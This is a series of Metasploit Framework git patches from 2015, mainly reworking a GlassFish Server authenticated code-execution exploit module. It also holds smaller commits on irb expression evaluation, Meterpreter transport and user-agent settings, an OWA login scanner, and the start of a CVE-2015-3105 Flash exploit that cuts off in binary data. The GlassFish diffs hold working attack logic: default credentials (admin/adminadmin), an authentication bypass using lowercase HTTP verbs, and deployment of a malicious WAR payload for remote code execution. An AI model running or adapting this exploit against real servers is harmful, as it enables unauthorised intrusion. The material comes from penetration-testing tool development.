zqlMYI2ee1D$F--lCU)_V_Nw-_c0xO=4e%s#O^x+T@+h8LJz-Cy=POT-XN-4+_fOtt
zuANY;*XV2Tz3O|<$L<w#8(_B9C=JTK*tBa?jw$U-x+#_!mOM+ql5Z)r6fyZqEJ4fD
zmS)R7CgCB=<t#V>>jG<$wU|>`W8G=}#M)`?vUXd~aXNdglFeYd)|PK8v=!NkZ37%*
z9A7z7Ib}1PTSCq*=Umrf*E<|*k86yosaLBvskf<jsv9^R5%p~rjS=ok+~eGrxu?1n
zx6AEw&v56t=eZZTm$^&bYutCcfA6k!|Jl9O{h0e1_hI*O_s2}x^X{m76jRo%&C-@=
zH)&h69~p~bo(#_{PmyPZC*;}Sx!+Uo3GMQ9cz*PZ^(x*h?*ra8@8@2gu6zUizxTiF
zf1T@?QCZEyDJ)U0uq?9NXnEFh!19RoN$U&NH?6vDt8Ke|xBVf<-yPi?(;DX!&V{ZE
z97qZ4-e&bF4&kJFT6MUuac^|r?>1*$o;8Ehn68y+cWMu6PldEo+V`5-^PuNl&nF(q
z8}KgmR(S99R(UghZN7c}11u}A`rqUN`hbPyQ~zoIS^qhIkN<+$v8vd-lHwGjlF0Is
zqD<k=5V5paR@>t2!|Yq_jrLvkm+Z40%N!3lOirsS%XLyMcUQTGWu;_I%(7&?kQF+X
zHB7r-`_^X^8?56d18c2S)^*nP)>><wb(3`qH;{U3Bg;$Jb<#CS{n%ZfwVgGOj`gv9
zkWv_xu;l^E4BL&iwcJa>wmRD;+ZNk?+uv;o_C&kMo@7t8r`gT+bbE$<jlI&o)?UTJ
z^tt_;klp0C#F6GOJJKC9xUp<=Y<KK%>~idJG&}Y=B923jVa_CHDz|2{^M2RNtiO96
z^}gtR&3o26nRQ*-#g|(4<0bXmELj`DRZ+(MghYgIR*+-KjZNFWDVxKEo#zfPTQ)IU
z8r?hGd)%8ZO_C>?q&D&Gp9A--^VE7ac{T@<<PN!cvn5$RJ#dSy-nQMgYwv^<dB41f
zUfp~l6?o2h>b$*P$(QRZ@dbVBeVcr{xV5x%{ipg>f1$t9zsbMF-^?1&&M6ZQ=w{xR
fs-!E~O0iO<)GHCCLy;_L7BjyG?9EA)o8|uj&`XwN


From 8e4fa80728fce5748d2814dccc95df4112f96d43 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 24 Jun 2015 19:30:02 -0500
Subject: [PATCH 0552/1013] This looks good so far

---
 .../framework/login_scanner/glassfish.rb      |  2 +-
 .../exploits/multi/http/glassfish_deployer.rb | 69 +++++++++++--------
 2 files changed, 41 insertions(+), 30 deletions(-)

diff --git a/lib/metasploit/framework/login_scanner/glassfish.rb b/lib/metasploit/framework/login_scanner/glassfish.rb
index 8537f8b04b..e3aa4124da 100644
--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -14,7 +14,7 @@ module Metasploit
 
         # @!attribute [r] version
         #   @return [String] Glassfish version
-        attr_reader :version
+        attr_accessor :version
 
         # @!attribute jsession
         #   @return [String] Cookie session
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 7fd2600524..5855a3ab9a 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def auto_target(session, res, version)
     print_status("Attempting to automatically select a target...")
 
-    res = query_serverinfo(session,version)
+    res = query_serverinfo(session, version)
     return nil unless res
     return nil unless res.body
 
@@ -601,7 +601,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Error: #{rhost} did not respond on #{app_rport}.")
     end
 
-    #Sleep for a bit before cleanup
+    # Sleep for a bit before cleanup
     select(nil, nil, nil, 5)
 
     #Start undeploying
@@ -619,10 +619,8 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Undeployment complete.")
   end
 
-  def init_loginscanner(creds)
-    @cred_collection = Metasploit::Framework::CredentialCollection.new(
-      userpass_file: creds * "\n"
-    )
+  def init_loginscanner
+    @cred_collection = Metasploit::Framework::CredentialCollection.new
 
     @scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
       configure_http_login_scanner(
@@ -654,30 +652,44 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def my_target_host
-    path = normalize_uri(datastore['PATH'])
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
+    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
   end
 
   def try_normal_login(version)
+    init_loginscanner
+
     case version
     when /2\.x|9\.x/
-      creds = ['admin adminadmin']
+      @cred_collection.prepend_cred(
+        Metasploit::Framework::Credential.new(
+        public: 'admin',
+        private: 'adminadmin',
+        private_type: :password
+      ))
     when /^3\./
-      creds = ['admin']
-    else
-      creds = []
+      @cred_collection.prepend_cred(
+        Metasploit::Framework::Credential.new(
+        public: 'admin',
+        private: '',
+        private_type: :password
+      ))
     end
 
-    creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}"
-
-    init_loginscanner(creds)
+    @cred_collection.prepend_cred(
+      Metasploit::Framework::Credential.new(
+      public: datastore['USERNAME'],
+      private: datastore['PASSWORD'],
+      private_type: :password
+    ))
 
+    @scanner.send_request({'uri'=>'/'})
     @scanner.version = version
     @cred_collection.each do |raw|
       cred = raw.to_credential
+      print_status("Trying to login as #{cred.public}:#{cred.private}")
       result = @scanner.attempt_login(cred)
-      if result == Metasploit::Model::Login::Status::SUCCESSFUL
-        return @scanner.:jsession
+      if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
+        return @scanner.jsession
       end
     end
 
@@ -692,15 +704,11 @@ class Metasploit3 < Msf::Exploit::Remote
       return sid if sid
     end
 
-    try_normal_login(version, user, pass, 'non-default')
+    try_normal_login(version)
   end
 
-  def make_war
-    my_target = auto_target(sid, res, version) if target.name =~ /Automatic/
-    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget
-
-    # Generate payload
-    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+  def make_war(selected_target)
+    p = exploit_regenerate_payload(selected_target.platform, selected_target.arch)
 
     jsp_name = rand_text_alphanumeric(4+rand(32-4))
     app_base = rand_text_alphanumeric(4+rand(32-4))
@@ -708,8 +716,8 @@ class Metasploit3 < Msf::Exploit::Remote
     war = p.encoded_war({
       :app_name    => app_base,
       :jsp_name    => jsp_name,
-      :arch        => mytarget.arch,
-      :platform    => mytarget.platform
+      :arch        => selected_target.arch,
+      :platform    => selected_target.platform
     }).to_s
 
     return app_base, jsp_name, war
@@ -729,8 +737,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
     @verbs = {
-      'GET'  => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET',
-      'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST',
+      'GET'  => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
+      'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
     }
 
     sid = attempt_login(version)
@@ -739,7 +747,10 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
     end
 
-    app_base, jsp_name, war = make_war
+    selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
+    fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target
+
+    app_base, jsp_name, war = make_war(selected_target)
     print_status("Uploading payload...")
     res = upload_exec({
       :session => sid,

From c826785ebb575436561bd0d18854027b6e46895d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 24 Jun 2015 19:49:04 -0500
Subject: [PATCH 0553/1013] Fix auth bypass

---
 .../exploits/multi/http/glassfish_deployer.rb    | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 5855a3ab9a..f5b1a84d6b 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -631,20 +631,22 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def try_glassfish_auth_bypass(version)
-    sid = false
+    sid = nil
 
     if version == '2.x' || version == '9.x'
+      print_status("Trying auth bypass...")
       res = send_glassfish_request('/applications/upload.jsf', 'get')
-      p = /<title>Deploy Enterprise Applications\/Modules/
-      if res && res.code.to_i == 200 && res.body.match(p) != nil
-        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
+      title = '<title>Deploy Enterprise Applications/Modules</title>'
+      if res && res.code.to_i == 200 && res.body.include?(title)
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     else
       # 3.0
+      print_status("Trying auth bypass...")
       res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
-      p = /<title>Deploy Applications or Modules/
-      if res && res.code.to_i == 200 && res.body.match(p) != nil
-        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
+      title = '<title>Deploy Applications or Modules'
+      if res && res.code.to_i == 200 && res.body.include?(title)
+        sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
       end
     end
 

From f6f21724a3f8ebf976df1ab51305742c5b987099 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 24 Jun 2015 20:52:17 -0400
Subject: [PATCH 0554/1013] Support expressions for the irb command

---
 lib/msf/ui/console/command_dispatcher/core.rb | 28 +++++++++++++++++--
 1 file changed, 26 insertions(+), 2 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index f395805f99..b0e7640e08 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -94,6 +94,10 @@ class Core
   @@go_pro_opts = Rex::Parser::Arguments.new(
     "-h" => [ false, "Help banner."                                   ])
 
+  @@irb_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner."                                   ],
+    "-e" => [ true,  "Expression to evaluate."                        ])
+
   # The list of data store elements that cannot be set when in defanged
   # mode.
   DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ]
@@ -759,8 +763,8 @@ class Core
   def cmd_irb_help
     print_line "Usage: irb"
     print_line
-    print_line "Drop into an interactive Ruby environment"
-    print_line
+    print_line "Execute commands in a Ruby environment"
+    print @@irb_opts.usage()
   end
 
   #
@@ -769,6 +773,26 @@ class Core
   def cmd_irb(*args)
     defanged?
 
+    expressions = []
+
+    # Parse the command options
+    @@irb_opts.parse(args) do |opt, idx, val|
+      case opt
+        when '-e'
+          expressions << val
+        when '-h'
+          cmd_irb_help
+          return false
+      end
+    end
+
+    if !expressions.empty?
+      expressions.each do |expression|
+        eval(expression, binding)
+      end
+      return
+    end
+
     print_status("Starting IRB shell...\n")
 
     begin

From f9642da387710c9ca01c20d7fc4debda3b930cc1 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 24 Jun 2015 21:02:18 -0400
Subject: [PATCH 0555/1013] Support expressions for meterpreter's irb too

---
 .../ui/console/command_dispatcher/core.rb     | 36 +++++++++++++++++--
 1 file changed, 34 insertions(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index e51c470a20..9fdb202cf8 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -30,6 +30,10 @@ class Console::CommandDispatcher::Core
     self.bgjob_id   = 0
   end
 
+  @@irb_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner."                  ],
+    "-e" => [ true,  "Expression to evaluate."       ])
+
   @@load_opts = Rex::Parser::Arguments.new(
     "-l" => [ false, "List all available extensions" ],
     "-h" => [ false, "Help menu."                    ])
@@ -322,15 +326,43 @@ class Console::CommandDispatcher::Core
 
   alias cmd_interact_tabs cmd_close_tabs
 
+  def cmd_irb_help
+    print_line "Usage: irb"
+    print_line
+    print_line "Execute commands in a Ruby environment"
+    print @@irb_opts.usage()
+  end
+
   #
   # Runs the IRB scripting shell
   #
   def cmd_irb(*args)
-    print_status("Starting IRB shell")
-    print_status("The 'client' variable holds the meterpreter client\n")
+    expressions = []
+
+    # Parse the command options
+    @@irb_opts.parse(args) do |opt, idx, val|
+      case opt
+        when '-e'
+          expressions << val
+        when '-h'
+          cmd_irb_help
+          return
+      end
+    end
 
     session = client
     framework = client.framework
+
+    if !expressions.empty?
+      expressions.each do |expression|
+        eval(expression, binding)
+      end
+      return
+    end
+
+    print_status("Starting IRB shell")
+    print_status("The 'client' variable holds the meterpreter client\n")
+
     Rex::Ui::Text::IrbShell.new(binding).run
   end
 

From 5a24dc8e64396ed91e87738962a0e6888764a1b7 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 25 Jun 2015 14:08:41 +1000
Subject: [PATCH 0556/1013] Enable the transport command for java

---
 .../post/meterpreter/ui/console/command_dispatcher/core.rb    | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index e51c470a20..5b62d0aa99 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -80,10 +80,10 @@ class Console::CommandDispatcher::Core
     if client.platform =~ /win/ || client.platform =~ /linux/
       # Migration only supported on windows and linux
       c["migrate"] = "Migrate the server to another process"
+    end
 
-
+    if client.platform =~ /win/ || client.platform =~ /linux/ || client.platform =~ /java/
       # Yet to implement transport hopping for other meterpreters.
-      # Works for posix and native windows though.
       c["transport"] = "Change the current transport mechanism"
 
       # sleep functionality relies on the transport features, so only

From 98156ec944b0749bc853c834a19512c071beddd3 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 25 Jun 2015 14:51:06 +1000
Subject: [PATCH 0557/1013] Add user agent to the transport config

Why this was missing I will never know :)
---
 lib/msf/core/payload/transport_config.rb         |  1 +
 lib/msf/core/payload/windows/reverse_http.rb     | 16 ++++++++--------
 lib/msf/core/payload/windows/x64/reverse_http.rb |  1 +
 3 files changed, 10 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index f75c5c3db2..f7f6ce198c 100644
--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -60,6 +60,7 @@ module Msf::Payload::TransportConfig
       :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
       :retry_total  => datastore['SessionRetryTotal'].to_i,
       :retry_wait   => datastore['SessionRetryWait'].to_i,
+      :ua           => datastore['MeterpreterUserAgent'],
       :proxy_host   => datastore['PayloadProxyHost'],
       :proxy_port   => datastore['PayloadProxyPort'],
       :proxy_type   => datastore['PayloadProxyType'],
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
index 7b0968fe2d..f6c3e32657 100644
--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -52,14 +52,14 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]         = generate_uri
-      conf[:exitfunk]    = datastore['EXITFUNC']
-      conf[:proxy_host]  = datastore['PayloadProxyHost']
-      conf[:proxy_port]  = datastore['PayloadProxyPort']
-      conf[:proxy_user]  = datastore['PayloadProxyUser']
-      conf[:proxy_pass]  = datastore['PayloadProxyPass']
-      conf[:proxy_type]  = datastore['PayloadProxyType']
-      conf[:retry_count] = datastore['StagerRetryCount']
+      conf[:url]        = generate_uri
+      conf[:exitfunk]   = datastore['EXITFUNC']
+      conf[:ua]         = datastore['MeterpreterUserAgent']
+      conf[:proxy_host] = datastore['PayloadProxyHost']
+      conf[:proxy_port] = datastore['PayloadProxyPort']
+      conf[:proxy_user] = datastore['PayloadProxyUser']
+      conf[:proxy_pass] = datastore['PayloadProxyPass']
+      conf[:proxy_type] = datastore['PayloadProxyType']
     end
 
     generate_reverse_http(conf)
diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb
index 47c333f020..a8f62b36da 100644
--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -58,6 +58,7 @@ module Payload::Windows::ReverseHttp_x64
     unless self.available_space.nil? || required_space > self.available_space
       conf[:url]        = generate_uri
       conf[:exitfunk]   = datastore['EXITFUNC']
+      conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
       conf[:proxy_port] = datastore['PayloadProxyPort']
       conf[:proxy_user] = datastore['PayloadProxyUser']

From 5c98da05fbb27c435b10b5c381969b75432d18f4 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 25 Jun 2015 01:58:24 -0500
Subject: [PATCH 0558/1013] This works for Glassfish 4.0 & 9.1

---
 .../exploits/multi/http/glassfish_deployer.rb | 95 +++++++++----------
 1 file changed, 47 insertions(+), 48 deletions(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index f5b1a84d6b..4f56c3b497 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'nokogiri'
 require 'metasploit/framework/login_scanner/glassfish'
 require 'metasploit/framework/credential_collection'
 
@@ -17,33 +18,30 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
       'Description'    => %q{
-          This module logs in to an GlassFish Server 3.1 (Open Source or Commercial)
-        instance using a default credential, uploads, and executes commands via deploying
-        a malicious WAR.  On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x
-        this module will try to bypass authentication instead by sending lowercase HTTP verbs.
+          This module logs in to an GlassFish Server (Open Source or Commercial) using various
+        methods (such as authentication bypass, default credentials, or user-supplied login),
+        and deploys a malicious war file in order to get remote code execution. It has been
+        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          # Msf module for Glassfish 3.0
-          'juan vazquez',
-          # Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
-          'Joshua Abraham <jabra[at]rapid7.com>',
-          # Rewrite for 3.0, 3.1 (Commercial or Open Source)
-          'sinn3r',
+          'juan vazquez', # Msf module for Glassfish 3.0
+          'Joshua Abraham <jabra[at]rapid7.com>', # Glassfish 3.1, 2.x & Sun Java System Application Server 9.1
+          'sinn3r' # Rewrite for everything
         ],
       'References'     =>
         [
           ['CVE', '2011-0807'],
-          ['OSVDB', '71948'],
+          ['OSVDB', '71948']
         ],
-      'Platform'       => 'win',
+      'Platform'       => ['win', 'linux', 'java'],
       'Targets'        =>
         [
           [ 'Automatic', { } ],
           [ 'Java Universal',    { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
           [ 'Windows Universal', { 'Arch' => ARCH_X86,  'Platform' => 'win' } ],
-          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ],
+          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ]
         ],
       'DisclosureDate' => "Aug 4 2011",
       'DefaultTarget'  => 0))
@@ -211,9 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
         return nil
       end
 
-      input_id = "javax.faces.ViewState"
-      p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(.*)" autocomplete="off"/
-      viewstate = res.body.scan(p)[0][0]
+      viewstate = get_viewstate(res.body)
 
       entry = nil
       p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
@@ -287,8 +283,8 @@ class Metasploit3 < Msf::Exploit::Remote
     p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
     edition = 'Open Source' if banner =~ p
 
-    #Set version.  Some GlassFish servers return banner "GlassFish v3".
-    if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
+    # Set version.  Some GlassFish servers return banner "GlassFish v3".
+    if banner =~ /(GlassFish Server|Open Source Edition) {1,}(\d\.\d)/
       version = $2
     elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
       version = $1
@@ -487,6 +483,22 @@ class Metasploit3 < Msf::Exploit::Remote
     return data
   end
 
+  def get_viewstate(body)
+    @vewstate ||= lambda {
+      noko = Nokogiri::HTML(body)
+      inputs = noko.search('input')
+      hidden_inputs = []
+      inputs.each {|e| hidden_inputs << e if e.attributes['type'].text == 'hidden'}
+      hidden_inputs.each do |e|
+        if e.attributes['name'].text == 'javax.faces.ViewState'
+          return e.attributes['value'].text
+        end
+      end
+
+      ''
+    }.call
+  end
+
   #
   # Upload our payload, and execute it.  This function will also try to automatically
   # clean up after itself.
@@ -503,40 +515,27 @@ class Metasploit3 < Msf::Exploit::Remote
       path = "/applications/upload.jsf?appType=webApp"
       res = send_glassfish_request(path, @verbs['GET'], session)
 
-      #Obtain some properties
-      begin
-        p1 = /id="javax\.faces\.ViewState" value="(j_id\d{1,5}:j_id\d{1,5})"/mi
-        p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
-        viewstate       = res.body.scan(p1)[0][0]
-        status_checkbox = res.body.scan(p2)[0][0]
-        boundary        = rand_text_alphanumeric(28)
-      rescue
-        print_error("Unable to gather required data for file upload")
-        return
-      end
+      # Obtain some properties
+      p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
+      viewstate       = get_viewstate(res.body)
+      status_checkbox = res.body.scan(p2)[0][0]
+      boundary        = rand_text_alphanumeric(28)
     else
       path = "/common/applications/uploadFrame.jsf"
       res = send_glassfish_request(path, @verbs['GET'], session)
 
-      #Obtain some properties
-      begin
-        #start is only for dynamic arguments in POST data
-        res.body =~ /propertySheetSection(\d{3})/
-        start = $1
-        p1 = /"javax\.faces\.ViewState" value="(-?\d+:-?\d+)"/mi
-        p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
-        p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
+      # Obtain some properties
+      res.body =~ /propertySheetSection(\d{3})/
+      start = $1
+      p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
+      p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
 
-        rnd_text = rand_text_alphanumeric(29)
+      rnd_text = rand_text_alphanumeric(29)
 
-        viewstate       = res.body.scan(p1)[0][0]
-        typefield       = res.body.scan(p2)[0][0]
-        status_checkbox = res.body.scan(p3)[0][0]
-        boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
-      rescue
-        print_error("Unable to gather required data for file upload")
-        return
-      end
+      viewstate       = get_viewstate(res.body)
+      typefield       = res.body.scan(p2)[0][0]
+      status_checkbox = res.body.scan(p3)[0][0]
+      boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
     end
 
     # Get upload data
@@ -604,7 +603,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Sleep for a bit before cleanup
     select(nil, nil, nil, 5)
 
-    #Start undeploying
+    # Start undeploying
     print_status("Getting information to undeploy...")
     viewstate, entry = get_delete_info(session, version, app_base)
     if !viewstate
@@ -746,7 +745,7 @@ class Metasploit3 < Msf::Exploit::Remote
     sid = attempt_login(version)
 
     unless sid
-      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
+      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate")
     end
 
     selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target

From c330d104035f9abe9ad8d1ec6b250c9861b0a805 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 25 Jun 2015 02:06:51 -0500
Subject: [PATCH 0559/1013] Make SSL as a basic option

Also:

Fix #5558
---
 modules/exploits/multi/http/glassfish_deployer.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 4f56c3b497..d2d1b02990 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -52,7 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
           OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
           OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
           OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
-          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/'])
+          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/']),
+          OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
         ], self.class)
   end
 

From 63f584cbfdf86e1438a7613d87bbe7c70cd1bd4f Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Thu, 25 Jun 2015 12:08:38 +0500
Subject: [PATCH 0560/1013] Add last_attempted_at

---
 modules/auxiliary/scanner/http/owa_login.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb
index 60970856b3..e1922e2268 100644
--- a/modules/auxiliary/scanner/http/owa_login.rb
+++ b/modules/auxiliary/scanner/http/owa_login.rb
@@ -341,6 +341,7 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
+      last_attempted_at: DateTime.now,
       status: Metasploit::Model::Login::Status::SUCCESSFUL,
     }.merge(service_data)
 

From 31c35715fc264463cdd97f8b1363682895241372 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Thu, 25 Jun 2015 11:08:35 -0500
Subject: [PATCH 0561/1013] YARD Documentation for file_info.rb

---
 lib/msf/core/post/windows/file_info.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/lib/msf/core/post/windows/file_info.rb b/lib/msf/core/post/windows/file_info.rb
index ad56db7d06..420584a12d 100644
--- a/lib/msf/core/post/windows/file_info.rb
+++ b/lib/msf/core/post/windows/file_info.rb
@@ -13,6 +13,11 @@ module FileInfo
     num & 0xffff
   end
 
+# File Version
+# @param [String]  filepath The path of the file you are targeting
+#
+# @return [String] Returns the file version of target
+
   def file_version(filepath)
     file_version_info_size = client.railgun.version.GetFileVersionInfoSizeA(
       filepath,

From ee0377ca16e78585f6bc083929000206666ca6f0 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 25 Jun 2015 13:35:01 -0500
Subject: [PATCH 0562/1013] Add module for CVE-2015-3105

---
 data/exploits/CVE-2015-3105/msf.swf           | Bin 0 -> 22360 bytes
 external/source/exploits/CVE-2015-3105/Elf.as | 235 +++++++++++
 .../source/exploits/CVE-2015-3105/Exploit.as  | 237 +++++++++++
 .../CVE-2015-3105/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2015-3105/ExploitVector.as   |  75 ++++
 .../exploits/CVE-2015-3105/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2015-3105/Logger.as   |  32 ++
 external/source/exploits/CVE-2015-3105/PE.as  |  72 ++++
 .../exploits/CVE-2015-3105/pbsrc_bin.pbj      | Bin 0 -> 7415 bytes
 .../exploits/CVE-2015-3105/test_bin.pbj       | Bin 0 -> 985 bytes
 .../adobe_flash_shader_drawing_fill.rb        | 146 +++++++
 11 files changed, 1281 insertions(+)
 create mode 100755 data/exploits/CVE-2015-3105/msf.swf
 create mode 100644 external/source/exploits/CVE-2015-3105/Elf.as
 create mode 100755 external/source/exploits/CVE-2015-3105/Exploit.as
 create mode 100644 external/source/exploits/CVE-2015-3105/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2015-3105/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2015-3105/Exploiter.as
 create mode 100644 external/source/exploits/CVE-2015-3105/Logger.as
 create mode 100644 external/source/exploits/CVE-2015-3105/PE.as
 create mode 100755 external/source/exploits/CVE-2015-3105/pbsrc_bin.pbj
 create mode 100755 external/source/exploits/CVE-2015-3105/test_bin.pbj
 create mode 100644 modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb

diff --git a/data/exploits/CVE-2015-3105/msf.swf b/data/exploits/CVE-2015-3105/msf.swf
new file mode 100755
index 0000000000000000000000000000000000000000..ab63fe0cf2551343501a6e2db44ada03f24ff295
GIT binary patch
literal 22360
